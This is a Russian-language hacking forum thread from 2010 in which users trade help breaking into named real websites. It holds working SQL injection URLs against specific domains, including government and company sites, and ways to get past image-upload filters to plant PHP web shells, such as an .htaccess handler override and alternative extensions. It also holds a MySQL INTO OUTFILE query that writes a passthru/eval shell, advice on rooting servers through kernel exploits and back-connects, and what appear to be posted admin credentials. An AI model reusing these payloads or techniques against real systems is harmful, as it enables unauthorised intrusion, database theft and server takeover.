Просмотр полной версии : Ваши вопросы по уязвимостям.
если мойно помоqите наыти админку
http://biophys.am:2082/
LokbatanLi
30.05.2010, 13:13
eto cPanel
.:[melkiy]:.
30.05.2010, 13:59
Скажите как проверить file_priv?
Вот например инъекция:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mys ql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл?
Для кого человек это писал? https://forum.antichat.ru/thread104591.html
Вот именно, что я это прочитал, делаю все как и написано, но ничего не получается.
Что не так делаю?
плохо читал видать :)
если ошибки
MySQL server version for the right syntax to use near '\'db156426_4\' --'
Access denied for user 'db156426_4'@'127.0.0.2' to database 'mysql'
тебе ни о чем не говорят,то я не знаю... :)
CyberHunter
30.05.2010, 14:14
Для кого человек это писал? https://forum.antichat.ru/thread104591.html
Вот именно, что я это прочитал, делаю все как и написано, но ничего не получается.
Что не так делаю?
DrakonSerg
30.05.2010, 14:42
вбей 'abcd, если abcd в ошибке будет, то крути.
Насчёт drupal, смотри /sites/название сайта, а вообще может быть любое/settings.php
В default редко бывают доступы.
вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'abcd%' AND active = 'Y' ORDER BY 'ProductTitle' ASC LIMIT 0, 16' at line 1
зы другой сайт
Есть форум phpbb3, залить шел через стиль невозможно, какие еще есть способы??
GOGA075 почему невозможно? у меня было такое что невозможно было редактировать стиль установленный, но если редактировал шаблон другого стиля и потом устанавливал его как основной , то все канало...
Gorev
В этом форуме нету ни редактора стилей ни функции "разрешать php..."
Админ видно удалил данные модули!!
Gorev
В этом форуме нету ни редактора стилей ни функции "разрешать php..."
Админ видно удалил данные модули!!
ну тогда видимо не получится через форумак залить
вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'abcd%' AND active = 'Y' ORDER BY 'ProductTitle' ASC LIMIT 0, 16' at line 1
зы другой сайт
abcdsdjahsdjkhdjkhjkdhasdjkasdhjkh%' order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 --
Если выведет 14, значит полей 13, и .т.п
abcdsdjahsdjkhdjkhjkdhasdjkasdhjkh%' union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --
ponel?
DrakonSerg
31.05.2010, 04:01
есть один сайт. На сайте search.php без параметров. В окошко вводим ' получаем:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/includes/functions.php on line 311
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/includes/functions.php on line 327
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/includes/functions.php on line 343
Warning: Cannot modify header information - headers already sent by (output started at /home/site/www/public_html/includes/functions.php:311) in /home/site/www/public_html/search.php on line 12
как я понял уязвим. Но... Куда подставлять параметры, если в адресной строке search.php неизменен. То есть вся работа скрипта скрыта. Можно ли как нибудь докопаться?
Nightmarе
31.05.2010, 05:40
есть один сайт. На сайте search.php без параметров. В окошко вводим ' получаем:
как я понял уязвим. Но... Куда подставлять параметры, если в адресной строке search.php неизменен. То есть вся работа скрипта скрыта. Можно ли как нибудь докопаться?
Судя по описанию, уязвимость в POST запросе а не GET, это только спец плагином можно подделать, например HackBar для FireFox.
А вот ошибочка далеко не означает SQL, это просто ошибка мускула, и не обязательно что там SQL есть.
Судя по описанию, уязвимость в POST запросе а не GET, это только спец плагином можно подделать, например HackBar для FireFox.
А вот ошибочка далеко не означает SQL, это просто ошибка мускула, и не обязательно что там SQL есть.
o_O
А само поле для поиска не?
есть один сайт. На сайте search.php без параметров. В окошко вводим ' получаем:
как я понял уязвим. Но... Куда подставлять параметры, если в адресной строке search.php неизменен. То есть вся работа скрипта скрыта. Можно ли как нибудь докопаться?
Модифицирую запрос разными способами. например в поля поиска введи or id= и так далее - дерзай ;)
DrakonSerg
31.05.2010, 08:30
замучился уже с этим сайтом. Сижу уже за ним часов 12 (
Нашел наконец то ошибку, которую можно вызвать через GET запрос
hxxp://site.com/gallery.php?file=1'
получаем на странице, кроме прочего контента (img всякие там):
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/gallery.php on line 35
NetDevilZ SQL Scaner сказал, что это (Blind Injection), как я понял "слепая скуль". Но как же она слепая, если выдает ошибку?
SQLI Helper 2.7 не смог ничего вытащить, показал лишь сервер и версию PHP
Pangolin.Pro тоже не помог. Говорит Cannot detecte keyword! Где мне достать этот keyword я понятия не имею.
Помогите, кто чем может. В какую сторону копать? Где почитать? Что мне вообще делать. База с сайта нужна, как никогда (кста установлен на Apache/2.0.52 (CentOS) PHP/5.1.6, то есть кроме как sql я наверное по другому к нему никак(( )
ЗЫ есть полная структура сайта, полученая intelli tamper, есть phpinfo файл, есть пару полей, что POST методом выдают ошибку.
ну крути как слепую можешь использовать метод floor(rand(0))
LokbatanLi
31.05.2010, 08:36
hxxp://site.com/gallery.php?file=(select*from(select+name_const(ve rsion(),1),name_const(version(),1))a)
DrakonSerg
31.05.2010, 08:41
hxxp://site.com/gallery.php?file=(select+from(select+name_const(ve rsion(),1),name_const(version(),1))a)
Я чесно сказать не понял, что ты хотел этим запросом добиться, но без изменени (что с параметром, что без)
ну крути как слепую можешь использовать метод floor(rand(0))
можно поподробней? Я вообще не представляю, с чего начать крутить ее.
hxxp://site.com/gallery.php?file=1+and+(select+1+from+(select+coun t(0),concat((select+version()),floor(rand(0)*2))+f rom+information_schema.tables+group+by+2)a)
лучше ссылку в студию если конечно сайт не в .ru зоне
замучился уже с этим сайтом. Сижу уже за ним часов 12 (
Нашел наконец то ошибку, которую можно вызвать через GET запрос
hxxp://site.com/gallery.php?file=1'
получаем на странице, кроме прочего контента (img всякие там):
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/gallery.php on line 35
NetDevilZ SQL Scaner сказал, что это (Blind Injection), как я понял "слепая скуль". Но как же она слепая, если выдает ошибку?
SQLI Helper 2.7 не смог ничего вытащить, показал лишь сервер и версию PHP
Pangolin.Pro тоже не помог. Говорит Cannot detecte keyword! Где мне достать этот keyword я понятия не имею.
Помогите, кто чем может. В какую сторону копать? Где почитать? Что мне вообще делать. База с сайта нужна, как никогда (кста установлен на Apache/2.0.52 (CentOS) PHP/5.1.6, то есть кроме как sql я наверное по другому к нему никак(( )
ЗЫ есть полная структура сайта, полученая intelli tamper, есть phpinfo файл, есть пару полей, что POST методом выдают ошибку.
Хочеться взять и ... :(
Если ошибка есть, то может быть и слепая (О чудо, я открыл глаза на мир скулей? ).
Ты бы лучше выложил ссылку.
hxxp://site.com/gallery.php?file=(select*from(select+name_const(ve rsion(),1),name_const(version(),1))a)
Ты вообще адекватный человек?
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/gallery.php on line 35
Если ошибка PHP, ошибки Sql синтаксиса нету, причём здесь твой вывод через ошибку?
hxxp://site.com/gallery.php?file=1+and+(select+1+from+(select+coun t(0),concat((select+version()),floor(rand(0)*2))+f rom+information_schema.tables+group+by+2)a)
лучше ссылку в студию если конечно сайт не в .ru зоне
Аналогично.
// Будь тут Grey, он бы вам таких клизм вставил, что вы бы больше сюда незаходили :)
2pinch, ну раз непомешан, чего советовать тогда?
DrakonSerg
31.05.2010, 09:34
2 Ctacok подскажи в какую сторону рыть, с чего начать, где почитать. С меня могорыч)
2 Ctacok подскажи в какую сторону рыть, с чего начать, где почитать. С меня могорыч)
https://forum.antichat.ru/thread43966.html
shell_c0de
31.05.2010, 11:31
есть один сайт. На сайте search.php без параметров. В окошко вводим ' получаем:
как я понял уязвим. Но... Куда подставлять параметры, если в адресной строке search.php неизменен. То есть вся работа скрипта скрыта. Можно ли как нибудь докопаться?
2DrakonSerg пробуй варианты с POST запросом или скинь линк на ресурс в ПМ
если после поиска в урле есть типо такого то...
приме:
search.php?go=search&action=se&search=123456789')+union+select+1,2,table_name,4,5 ,14+from+information_schema.tables+--+
есть один сайт. На сайте search.php без параметров. В окошко вводим ' получаем:
как я понял уязвим. Но... Куда подставлять параметры, если в адресной строке search.php неизменен. То есть вся работа скрипта скрыта. Можно ли как нибудь докопаться?
Попробуй влиять на запрос, как при get-запросе.
Например: при вводе в поле поиска 1 - получаешь результат "А", при вводе 1+AND+1=1 - получаешь результат "А", а при вводе 1+AND+1=2 - получаешь резульата "В".
Ошибка не является sql-инъекцией, а вот влияние на результат запроса - ДА.
Можно ли сбрутить пасс к бд,зная его его имя хоста,имя юзвера,имя бд,и префикс?
имя хоста localhost
пользователь pesgame_nhl04
имя БД pesgame_nhl04
префикс jos_
Cам сайт nhl04-club.pesgame.net
Разцелую плюсами и помогу финансово,заранее спасибо за помощь.
Можно ли сбрутить пасс к бд,зная его его имя хоста,имя юзвера,имя бд,и префикс?
...
префикс jos_
Что-то мне подсказывает, что это joomla ;)
Что-то мне подсказывает, что это joomla ;)
Она самая,а что?
Она самая,а что?
Потому что в joomle во многих случаях используется чистый md5 хешь.
Я так понимаю доступа к базе нет, соответственно и хешь получить не можешь.
Потому что в joomle во многих случаях используется чистый md5 хешь.
Я так понимаю доступа к базе нет, соответственно и хешь получить не можешь.
Ну еслибы был доступ к базе,я бы щас ничего уже не спрашивал;)
Токо вот вопрос был,можно ли как-то сбрутить пасс от бд,зная все данные кроме пасса,а не какой алгоритм шифрования в джумле.
P.S.Ну в джумле я раньше встречал только алгоритм md5($pass.$salt).Вообще,тут не все так просто,там еще стоит итеграция базы форума(vbulletin) и сайта(joomla).
LokbatanLi
31.05.2010, 16:15
не видел никояда пасс от бд бил мд5//
CyberHunter
31.05.2010, 16:19
Скажите, как быть, если вот такая ошибка:
Database error: Invalid SQL: SELECT * FROM page WHERE id = 66ý AND (status = 'active' OR status = 'locked') AND date_push < '2010-05-31 22:17:16' AND (date_pull = '0000-00-00 00:00:00' OR date_pull > '2010-05-31 22:17:16') ORDER BY rank
MySQL Error: 1054 (Unknown column '66ý' in 'where clause')
Session halted.
Можно ли провести инъекцию в таком случае? Вот линк: http://www.bicentenary.tas.gov.au/page.php?id=66%FD
Pashkela
31.05.2010, 16:40
Скажите, как быть, если вот такая ошибка:
Можно ли провести инъекцию в таком случае? Вот линк:
попробуй):
http://www.bicentenary.tas.gov.au/page.php?id=-66+or+1=1+and+substring(version(),1,1)=3
.:[melkiy]:.
31.05.2010, 16:41
2 CyberHunter
http://www.bicentenary.tas.gov.au/print.php?id=127+and+substring(version(),1,1)=3
3 ветка
http://www.johnrausch.com/PuzzleWorld/toc.asp?t=_cat/io001.htm&m=https://forum.antichat.ru
открывается в фрейме
и как это понять? asp инъекция? :)
вот только asp файлы не интерпретируются...
http://www.johnrausch.com/PuzzleWorld/toc.asp?t=_cat/io001.htm&m=https://forum.antichat.ru
открывается в фрейме
и как это понять? asp инъекция? :)
вот только asp файлы не интерпретируются...
*FACEPALM*
Ну раз фрейм, какая нах asp инъекция?
Уважаемые ачатовцы, вы меня с каждым днём всё больше удивляйте со своими вопросами.
у некоторых мания величия...
А помоему кто-то тупо набивает посты и хочет быть в бане.
И не мания величия это, а обычная реакция на вопросы типа:
"Пишу -1 union select 1, а мне в ответ The used SELECT statements have a different number of columns".
И то что я тебя упомянул в прошлом посте, ты заслужил этого.
*FACEPALM*
Ну раз фрейм, какая нах asp инъекция?
Уважаемые ачатовцы, вы меня с каждым днём всё больше удивляйте со своими вопросами.
первый раз встречал,и поэтому не был уверен..а так понял .спс ))
CyberHunter
31.05.2010, 23:06
Скажите как открыть архив в с99 шелле?
Скажите как открыть архив в с99 шелле?
Я так понимаю ты хочешь его распаковать, а не открыть.
Зависит от того, какой архив и какая ОС.
В линуксе так:
tgz или tar.gz - tar -zxvf < file >
tar.bz2 - tar -xvfj < file >
zip - unzip < file >
rar - unrar x < file >
В виндовс:
Ищи директорию с архиватором.
Для ВинРар:
> cd C:\Program Files\WinRAR\
> unrar e < file >
Не могу найти админку, сканером только это нашел.
» http://www.onlinenews.com.pk/Team/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/css/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/img/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/news/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/plesk-stat/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/preview/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/site/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/weather/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/css/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/db/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/favicon.ico HTTP 200 OK
» http://www.onlinenews.com.pk/images/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/img/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/index.php HTTP 200 OK
» http://www.onlinenews.com.pk/news/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/picture_library/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/team/ HTTP 403 Forbidden
» http://www.onlinenews.com.pk/weather/ HTTP 403 Forbidden
Скажите как открыть архив в с99 шелле?
Win32,
Льёшь этот файл http://disk.re4ka.net/files/70985850/pclzip.lib.php на сервер.
Потом в тойже папке создаёшь файл, unzip.php
<?php set_time_limit(0); $file='file.zip'; require_once('pclzip.lib.php'); $zip = new PclZip($file); $ext = $zip->extract(); if($ext==0) die("Ошибка! ".$zip->errorInfo(true)); foreach ($ext as $val) { echo $val['filename']."<br />"; } echo "<b>Файлы успешно извлечены!!</b>"; ?>
$file как бы твой zip файл.
ребят в админке есть место для загрузки картинок,стоит фильтр,не могу загрузить php файл.. переименовал файл в php.jpg ,файл загрузилось,но не интерпретируется..
есть еще методы обхода фильтрации?
ребят в админке есть место для загрузки картинок,стоит фильтр,не могу загрузить php файл.. переименовал файл в php.jpg ,файл загрузилось,но не интерпретируется..
есть еще методы обхода фильтрации?
а это был метод обхода?
как фильтруется? белый список или черный? если второе, то .php3 попробуй.
Jokester
01.06.2010, 15:12
ребят в админке есть место для загрузки картинок,стоит фильтр,не могу загрузить php файл.. переименовал файл в php.jpg ,файл загрузилось,но не интерпретируется..
есть еще методы обхода фильтрации?
У меня возле дома стоит автомат по приёму платежей. Он принимает купюры и монеты.
Я попробывал засунуть туда рулон туалетной бумаги с написанной на ней цифрой 1000 - не сработало. В монетоприёмник засовывал жетоны на метро - не катит, а крышка от колодца туда не полезла :(
Можно как-то обойти проверку?
У меня возле дома стоит автомат по приёму платежей. Он принимает купюры и монеты.
Я попробывал засунуть туда рулон туалетной бумаги с написанной на ней цифрой 1000 - не сработало. В монетоприёмник засовывал жетоны на метро - не катит, а крышка от колодца туда не полезла :(
Можно как-то обойти проверку?
Jokester вообще то так можно обойти фильтрацию (php.jpg) :)
если хочешь могу отправить в личку
У меня возле дома стоит автомат по приёму платежей. Он принимает купюры и монеты.
Я попробывал засунуть туда рулон туалетной бумаги с написанной на ней цифрой 1000 - не сработало. В монетоприёмник засовывал жетоны на метро - не катит, а крышка от колодца туда не полезла :(
Можно как-то обойти проверку?
Если попробовать порезать тысячу на пополам и аккуратно приклеить к двум рулочикам туалетной бумаги может прокатит, и получиться две тысячи. А с жетонами - попробуй им бока подпилить об бордюр , мы так еще в детстве делали, когда автомат принимал 5 рублёвки а мы в него запихивали 50 копеечные ( или рублёвые, не помню :( ) старые со спиленными боками и принимал. Попробуй, если не получиться, то пиши, придумаем еще что-нибудь ;)
Jokester
01.06.2010, 15:22
Jokester вообще то так можно обойти фильтрацию (php.jpg) :)
если хочешь могу отправить в личку
Спасибо, я пожалуй воздержусь от такого зрелища.
Всё зависит от кода и настроек сервака. Да, если админ конченный кретин и у него не зарегистрировано jpg это прокатит, но я таких не видел.
А при тех условиях что ты дал можно гадать бесконечно и может прокатить любой вариант или не прокатить не один при нормальной реализации проверки
Спасибо, я пожалуй воздержусь от такого зрелища.
Всё зависит от кода и настроек сервака. Да, если админ конченный кретин и у него не зарегистрировано jpg это прокатит, но я таких не видел.
А при тех условиях что ты дал можно гадать бесконечно и может прокатить любой вариант или не прокатить не один при нормальной реализации проверки
Я был бы очень рад, если бы ты дал мне совет по этому поводу :)
Iceangel_
01.06.2010, 15:31
Jokester вообще то так можно обойти фильтрацию (php.jpg) :)
если хочешь могу отправить в личку
где то я это уже видел ))))
Попробуй .htaccess, подмену mime-types, .php.ggif, shell.jpg.php
льешь хтацесс с таким содержимым:
<Files "shell.jpg">
RemoveHandler .jpg
AddType application/x-httpd-php .jpg
</Files>
и вслед shell.jpg
где то я это уже видел ))))
Попробуй .htaccess, подмену mime-types, .php.ggif, shell.jpg.php
Iceangel_ спасибо за отзыв, не понял только одно ,какую роль здесь может играть htaccess?
Jokester
01.06.2010, 15:38
Я был бы очень рад, если бы ты дал мне совет по этому поводу :)
А я был-бы очень рад, если-бы тут не задавали глупых вопросов, а сначала думали.
Наверное проверка на расширение для того и сделана, что-бы не возможно было залить то, что нельзя. Или её по Вашему для чего делают?
Да, если это делал криворукий кодер, то ВОЗМОЖНО! варианты есть, но без кода можно гадать бесконечно долго.
Вот материал, рекоммендую ознакомится
http://habrahabr.ru/blogs/php/44610/
Iceangel_ спасибо за отзыв, не понял только одно ,какую роль здесь может играть htaccess?
С помощью htaccess можно переопределить средства интерпритирования файлов с определенным расширением.
Например: если в твоем случае есть доступ к файловой системе :) заливаешь туда htaccess (в директорию куда кладутся залитые картинки), который содержит код, предложенный Iceangel_ и льеш свой шелл с расширением jpg. Фильтрацию по расширению обойдешь и шелл будет работать.
Это лиш в том случае если хтакцесса нет в корне где уже описаны правила обработки интерпретатором...
30 % что зальёться .htaccess :) Т.к. если он уже php режет, это уже значит фильтрация.
// o_OPS Теория фильтрации fail. 30 % :)
И 95 % что сам .htaccess проканает. Т.к. не всегда .htaccess :)
Да и кто знает, мб там .htaccess лежит :O
Кстате DSU, IceAngel_ прав, если даже .htaccess в главной сказал мол jpg текст, то он в своей уже удаляет это правило, и создаёт новое.
Iceangel_
01.06.2010, 19:23
']Это лиш в том случае если хтакцесса нет в корне где уже описаны правила обработки интерпретатором...
Сомневаюсь. Можно пример такого .htaccess`а ?
З.Ы.
Заранее прошу обратить внимание на директиву RemoveHandler в моем примере.
Цитата:
Сообщение от [ DSU ]
Это лиш в том случае если хтакцесса нет в корне где уже описаны правила обработки интерпретатором...
Сомневаюсь. Можно пример такого .htaccess`а ?
З.Ы.
Заранее прошу обратить внимание на директиву RemoveHandler в моем примере.
я думаю он имел ввиду, что может не хватить прав на перезапись хтаксеса, если он там уже лежит ;)
ребят в админке есть место для загрузки картинок,стоит фильтр,не могу загрузить php файл.. переименовал файл в php.jpg ,файл загрузилось,но не интерпретируется..
есть еще методы обхода фильтрации?
С htaccess-ом конечно интересно, но если php.jpg загрузился, то значит фильтрация по расширению. Скорей всего фильтрация расширений по типу "разрешено все, что не запрещено". Попробуй пихнуть что-то типа php.222 и если прокатит, то пробуй все возможные расширения, которые интерпретируются как php. Например: .php3 .php .phtml .php4 .php5
Можете че и забыли в фильтре написать.
Привет группы;
Как мы можем получить таблицу с этого сайта, то посмотрим Запретный
http://www.hoanganjsc.com.vn/product.php?prodid=-90%20union%20select%201,2,3,4,5,6,7,8,9,10,11,1,2, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33%20--
Вьетнамский сайте
Привет группы;
Как мы можем получить таблицу с этого сайта, то посмотрим Запретный
http://www.hoanganjsc.com.vn/product.php?prodid=-90%20union%20select%201,2,3,4,5,6,7,8,9,10,11,1,2, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33%20--
Вьетнамский сайте
И откуда ты взял во втором selectе 33 столбца? Для параметра prodid правильный запрос будет
http://www.hoanganjsc.com.vn/product.php?prodid=-90+union+all+select+1,2,3,4--+
И откуда ты взял во втором selectе 33 столбца? Для параметра prodid правильный запрос будет
http://www.hoanganjsc.com.vn/product.php?prodid=-90+union+all+select+1,2,3,4--+
'33' я получил от "order by"
http://www.hoanganjsc.com.vn/product.php?prodid=90%20order%20by%2034-- <-- Ошибка
мы можем придать таблице этого сайта, потому что сайт не показал какой-либо номер для инъекций?
Jokester
02.06.2010, 14:06
И откуда ты взял во втором selectе 33 столбца? Для параметра prodid правильный запрос будет
http://www.hoanganjsc.com.vn/product.php?prodid=-90+union+all+select+1,2,3,4--+
всё он верно сделал. Просто там несколько запросов
http://www.hoanganjsc.com.vn/product.php?prodid=-90/**/union/**/select/**/1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Ver sion()))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
всё он верно сделал. Просто там несколько запросов
http://www.hoanganjsc.com.vn/product.php?prodid=-90/**/union/**/select/**/1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Ver sion()))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
воу, большое!
поблагодарить Jokester
Вроде бы на прошлой странице уже решили эту проблему или на этом сайте нужно было вывести данные именно в переменной тс?))
Ошибка реагирует на union+select.
http://www.hoanganjsc.com.vn/product.php?catid=-52+union/**/select+1,2,3,4,5,6,7,8,9,10,version()--+
Jokester, зачем эти хексы, анхексы. Всё и так прекрасно выводится. Не в обиду :)
http://www.hoanganjsc.com.vn/product.php?prodid=-90+union/**/select+1,2,concat_ws(0x3a,user(),database(),versio n()),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33--
LokbatanLi
02.06.2010, 16:41
http://www.mibf.ru/index.php?id=23+union+select+0,1,2,3,4,5,6,7,8,9
pomoqite raskrutit skul
http://www.mibf.ru/index.php?id=23+union+select+0,1,2,3,4,5,6,7,8,9
pomoqite raskrutit skul
пока получилась только слепая инъекция:
http://www.mibf.ru/index.php?id=23+and+substring(version(),1,1)=5--+
Jokester
02.06.2010, 17:28
LokbatanLi
Если девятое поле не числовое отрабатывает редирект, а потом в урле вывод
http://www.mibf.ru/index.php?id=-23+union+select+1,2,3,4,5,6,7,version(),null,10/*
v1d0qz
Специально поставил хекс\анхекс ибо на въетнамском сайте у него дальше 99% начнутся проблемы с кодировкой, он опять придёт сюда с вопросом, и опять подарит мне "воу, большое!". А зачем мне два больших "воу", сам подумай? Я с одним-то не знаю что теперь делать :(
LokbatanLi
02.06.2010, 20:12
http://www.armeniafund.org/press_releases/press_releases.php?id=-234+union+select+0,1,2,3,4,5,6
version()-4.0.27
mysql.user-net access
vot tolko nasel table_name-login nu ne moqu ne kak nayti column_name//
esli mojno pomoqite pojalusta//
i pomoymu bil sposob mojno nayti v 4 vetke column_name esli znaem table_name//
nu ne znayuk kak eto bil i qde 4ital..
pomoqite..
всё он верно сделал. Просто там несколько запросов http://www.hoanganjsc.com.vn/product.php?prodid=-90/**/union/**/select/**/1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Ver sion()))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
а как насчет вывод таблиц (information_schema.tables фильтруется) там тоже фильтруется....
можно и так
http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15 ,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
Заливаю шелл shell.php, shell.php.doc, shell.php.txt
выводит такую ошибку
Wrong field content:
File - allowed file extensions are PDF, PPT, PPS, DOC, XLS, TXT, HTM, HTML, GIF, JPG, RAR, ZIP
Как еще можно попробывать залить шелл?
Заранее всем спасибо!
попробуй shell.php.xls
Не проходит.
Jokester
02.06.2010, 21:07
а как насчет вывод таблиц (information_schema.tables фильтруется) там тоже фильтруется....
можно и так
http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15 ,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/select+1,2,UNHEX(HEX(concat_ws(0x3a,table_schema,t able_name,column_name))),4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33/**/from/**/information_schema.columns+limit+1,1--
Помогите залить шелл!
http://www.arnold.ee/admin/
Arnold:040286
ребят вот интересует вопрос, если повесить iframe в индексе сайта и перенаправить трафик на Xсайт, то через какое то время у сайта X Page Rank выростит?
то есть связано ли показатель google-a с посещаемостью сайта ? :)
не связаны
Где можно регнуть базу данных MySQL так что бы можно запускать скрипты на взломанном сервере, а база данных была отдельно??
P.S. сори немного не по теме может!!
Где можно регнуть базу данных MySQL так что бы можно запускать скрипты на взломанном сервере, а база данных была отдельно??
P.S. сори немного не по теме может!!
http://www.freemysql.net/
http://www.freesql.org/freesql/mysql
Monaxdixon
03.06.2010, 01:30
Мне не понятно какие именна подбирать?
Monaxdixon
Чаще всего что то типо
user users admin mysql members phpbb_users
и так далее!!
Вот список из 650 таблиц которые чаще всего бывают
http://narod.ru/disk/21459300000/tabl.rar.html
скачай SIPT с ним идет небольшой словарик таблиц, думаю хватит ибо если там нет то обычно тогда идет просто долбанутый префикс к нажваниям таблы который просто так не брутанеш
Этот сайт является пользователем таблицы
http://www.southend.gov.uk/news/default.asp?id=946'
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'releaseID =946' ORDER BY displayOrder DESC'.
/news/includes/applogic_head.asp, line 23
Поэтому мы получили синтаксической ошибки в " FROM clasue.", когда мы используем union?
так, как мы можем придать этот сайт? :confused:
http://www.southend.gov.uk/news/default.asp?id=-946+union+select+1,2%20from%20user--
Microsoft JET Database Engine error '80004005'
Syntax error in FROM clause.
/news/includes/applogic_head.asp, line 23
LokbatanLi
03.06.2010, 09:02
net eto access injection..pervoe nayti table_name a potomo column number//
naprimer
http://www.southend.gov.uk/news/default.asp?id=946+union+select+0+from+admin
stasiliy
03.06.2010, 10:06
Помогите плз.
Узнал через пхп инъекц. доступ от МУСКУл.
Создаю в файле запрос
select '<?php passthru($_GET['cmd'])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
Пишет ошибку,так как у нас $_GET['cmd']
Подскажите как обойти эти кавычки =)
Iceangel_
03.06.2010, 10:11
Помогите плз.
Узнал через пхп инъекц. доступ от МУСКУл.
Создаю в файле запрос
select '<?php passthru($_GET['cmd'])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
Пишет ошибку,так как у нас $_GET['cmd']
Подскажите как обойти эти кавычки =)
во-первых можно захексить -
select 0x3C3F70687020706173737468727528245F4745545B27636D 64275D293F3E into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
во-вторых можно без кавычек
select '<?php passthru($_GET[cmd])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
в-третьих - юзай eval
stasiliy
03.06.2010, 10:22
вот создал запрос select '<? eval($_GET[cmd]);?>' into outfile блабла
файл создался, пишет ошибку
Parse error: syntax error, unexpected ')' in /usr/home/yana2/www/site10/public_html/lnd2.php on line 1
я чето не вижу в синтаксисе ошибку((
вот создал запрос select '<? eval($_GET[cmd]);?>' into outfile блабла
файл создался, пишет ошибку
Parse error: syntax error, unexpected ')' in /usr/home/yana2/www/site10/public_html/lnd2.php on line 1
я чето не вижу в синтаксисе ошибку((
ты прямо подставляй запрос cmd=phpinfo();
stasiliy
03.06.2010, 10:54
Я ведь делаю запрос со своего сервера, с файла
$query ="select '<? echo eval($_GET['cmd']);?>' into outfile '/usr/home/yana2/www/site10/public_html/lnd10.php'";
$res = mysql_query($query);
ошибка syntax error
Если пишу eval($_GET[cmd]); <- без кавычек
то оштбка:yntax error, unexpected ')'
Помогите, может както кодировку понятную мускул зделать?
Я ведь делаю запрос со своего сервера, с файла
$query ="select '<? echo eval($_GET['cmd']);?>' into outfile '/usr/home/yana2/www/site10/public_html/lnd10.php'";
$res = mysql_query($query);
ошибка syntax error
Если пишу eval($_GET[cmd]); <- без кавычек
то оштбка:yntax error, unexpected ')'
Помогите, может както кодировку понятную мускул зделать?
Хекси.
stasiliy
03.06.2010, 11:09
О )) спс)) все работает)
И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?
привет команде;
Можно ли придать этим сайтом? потому что я пытался, но никакого результата
http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''36''' at line 1
http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%20order%20by%201000-- <-true
:confused:
О )) спс)) все работает)
И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?
Да, рутай сервер.
Ищи сплоит под версию ядра (uname -a), делай бэкконект и пробуй запустить плоент.
Если год версии ядра 2010, то врят ли порутаешь.
О )) спс)) все работает)
И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?
Редко, если только пользователь, от которого запускается web-сервер, является владельцем или входит в группу владельцев папки, к которой необходимо поменять доступ.
Здесь есть SQL-inj?
http://www.bigr.nl/website/structure/main.php?page=people&subpage=person&id=51'+order+by+1000+--+
.:[melkiy]:.
03.06.2010, 12:23
привет команде;
Можно ли придать этим сайтом? потому что я пытался, но никакого результата
http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%27
